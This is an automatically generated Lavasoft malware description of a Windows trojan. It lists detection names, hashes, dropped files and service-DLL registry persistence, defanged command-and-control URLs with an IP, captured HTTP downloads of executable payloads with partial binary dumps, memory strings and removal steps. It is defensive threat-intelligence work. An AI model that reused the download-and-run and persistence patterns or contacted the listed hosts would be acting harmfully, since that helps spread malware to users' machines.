Trojan.Win32.FlyStudio_8a34168adf

by malwarelabrobot on July 29th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!8A34168ADFEB (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGD17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8a34168adfebf655291073a2b140789f
SHA1: 1a7d5409c3aa0bc10cabd8b1a465e195f96427dd
SHA256: 7b9df1ac56ba8f69f68d53fdf619bc1311f4e45d0780ddd2cce37c7bd6855e2e
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObf1:2PmDqL8n75zYGWr9nTjf1
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3408

The Trojan injects its code into the following process(es):

tip.exe:1804

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (132025 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29542 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (170421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (48521 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:1804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@499D.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@499D.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 37
0993637493f3b7d48e60406846b67cd2
e5f865c19ad6cf3f794e0f029c15624b
304af875e6866b72f93e4e0b14152468
c340bcab1f0e3da360a6c676dfca920f
866a663983df6eb9f173e738b7492af5
fe1190b636e01304dfea8c5985a676ae
fff5b97e7de8f602d3d0749880184afe
6dcfa3790537394ba27309980b26c6a9
b3b68d037f5ada39b8c815e7763963ef
559815f0958d0d56ef805ac06a4ecea4
2129f218596a99ecf0b8bc9930ce2f05
f490d78f241cef804d76dbc508da32cf
fdd3c156fcf06e0a8d1811f88c679446
06626e0fe5c2fbc2845f7c5f7c95ce81
d85e9bb1ca7f50942b739f9aa9aff2f9
f675f7d3926014be4374360a8e0b2b85
e897d3f6c6b12ec4ddb75156fa6e5dc5
6c877d78dc6550ff99e7d85f869890f8
043e9f7631f4e6b66c1cd7c10c54e798
04926704a0652a9a474cf32bd3082d70
7c91e2d9cb04086a0d715c28f0bbdee7
0c19e99da34fe4be304b712e12aa62d6
80bcb1c0eee0431acf6c8bf9828b43ac
679ca4072db9508e6edf9cfab4efa11a
f871cbafed0b12bc181da00ce3f04760
a695e4bbbf3cf947db4ab8c873014d78

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
api.knsdknknndnfjenkjwwlekfj.com 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:24 GMT
Content-Length: 974336
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
....|o......|o..U...|o......[.......[.......[.........d.............s.
......s.......s.......Rich............................PE..L.....vY....
.......!.....X...........".......p............................... ....
........@.........................PF.......F..........................
.........o......8...........................H...@............p........
.......................text....V.......X.................. ..`.rdata..
.....p.......\..............@..@.data...x:...`...(...D..............@.
...tls.................l..............@....reloc...o.......p...n......
........@..B..........................................................
......................................................................
......................................................................
......................................................................
.............................................P....fJ..h.d....`........
.d.........P.....#...Y......................&J..h.d...................
...............Y.......................I..h.d.........................
.........Y.......................I..h.d..............................c
...Y......................fI..j.h.....................................
J1..h.e.......Y......................I..j.h...........................
...........0..h e.......Y................ .....H..j.h..... .....0.....
....4......... ......0..h@e...r...Y................8....vH..j.h...
<<< skipped >>>

GET /tip.bin HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:31 GMT
Content-Length: 304640
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........;...U...U.
..U...Y...U.m.[...U..._.U.U...^...U...F...U...F...U...T...U...^...U...
_...U...U...U.).S...U.Rich..U.........................PE..L....DKY....
................. .......|............@...............................
......................................................................
......................................................................
......................UPX0....................................UPX1....
............................@....rsrc.... ..........................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....h./wb<.j.Y.......P..&$...m..3...U..h....j.h...j
...o..i...h.R....@......$..m..(.....@..]..m...&..}.f.E....f.E..m..}m..
...$..U.M^.Ku...\..v........e....g9"t.....h..a...`5J.Q...K.d.5h..h0...
.q...W....]...{{.w..]..t.....e. ...M..`.D.l@j.j.G.....y.....-...{(l...
.%......G......k).Z4...P..d! C...."I*C.@_.P.... *.h..$9hx.L._..u...%.=
...d..u.J.....t..g....A..t;.u.......~.....3............t..A.L&..t...p.
.....t....A. ........s.*..@... ..<$Q.E..{.W.u......QW.Y..W.......Iu
.zS[.X..7E..$W.UV...2.....H;..^<...XA....6(.....f..9..gp .v<
<<< skipped >>>


GET /api/report HTTP/1.1
Server: Ud0RCGD262adcB0Ry9AyXqcq0kAd0BtGCLA2ABY26qFLNowRXq0G6ycy3G4RA272cLxq4yNoAdikcEKLt98L0RMEJoKdLVFG7BAyy9FquLAyYkck3dt90RL20RlBoG4LRdFRcLWouyXyXEFy5RWoXEMoWqxRBdXRrG4qzE8yXq4L8L8qXEzErGwL4yXoFqrkJoaRJoW9adC2JoL20RhGDG6k3dckCkWBtEWEtEyV5RWoAyob
Server-Key: yLoEqRlrkBdG921pITZbVHhOSfvmQgejJPAtiY703asnDuzM6c4wWFX8KCNUx5
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: BmkC8QKEXRNgF3cqsdSLatn9UWGhifJw7zZrVbOo5T0lx4Y6M2IyjD1PHevpuA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:26 GMT
[DATA]BmkC8QKEXRNgF3cqsdSLatn9UWGhifJCXGXiX8X1XGX2BGXjXGX2BGX2XGXiX8XH
X8XDBGXjXGXhXGXKXGX2XGXvX8XiX8XyXGX2XGXKXGXKXGXjXGXnXGX2XGXiX8XHX8XiX8
X3XGXSXGXgXGXhXGXYXGXVXGXjXGX2BGX2XGXPB8X3XGXjXGX2BGXjXGXiX8X6XDXw7zZr
VbOo5T0lx4Y6M2IyjD1PHevpuA[DATA]HTTP/1.1 200 OK..Cache-Control: no-cac
he..Pragma: no-cache..Content-Length: 242..Content-Type: text/plain; c
harset=Windows-1252..Expires: -1..Server: Microsoft-IIS/8.5..Server-Ke
y: BmkC8QKEXRNgF3cqsdSLatn9UWGhifJw7zZrVbOo5T0lx4Y6M2IyjD1PHevpuA..X-A
spNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 28 Jul 201
7 12:33:26 GMT..[DATA]BmkC8QKEXRNgF3cqsdSLatn9UWGhifJCXGXiX8X1XGX2BGXj
XGX2BGX2XGXiX8XHX8XDBGXjXGXhXGXKXGX2XGXvX8XiX8XyXGX2XGXKXGXKXGXjXGXnXG
X2XGXiX8XHX8XiX8X3XGXSXGXgXGXhXGXYXGXVXGXjXGX2BGX2XGXPB8X3XGXjXGX2BGXj
XGXiX8X6XDXw7zZrVbOo5T0lx4Y6M2IyjD1PHevpuA[DATA]....


GET /api/ip HTTP/1.1


User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:37 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_160:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_1804:

`.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)

tip.exe_1804_rwx_00401000_000B6000:

t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3408

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (132025 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29542 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (170421 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (48521 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now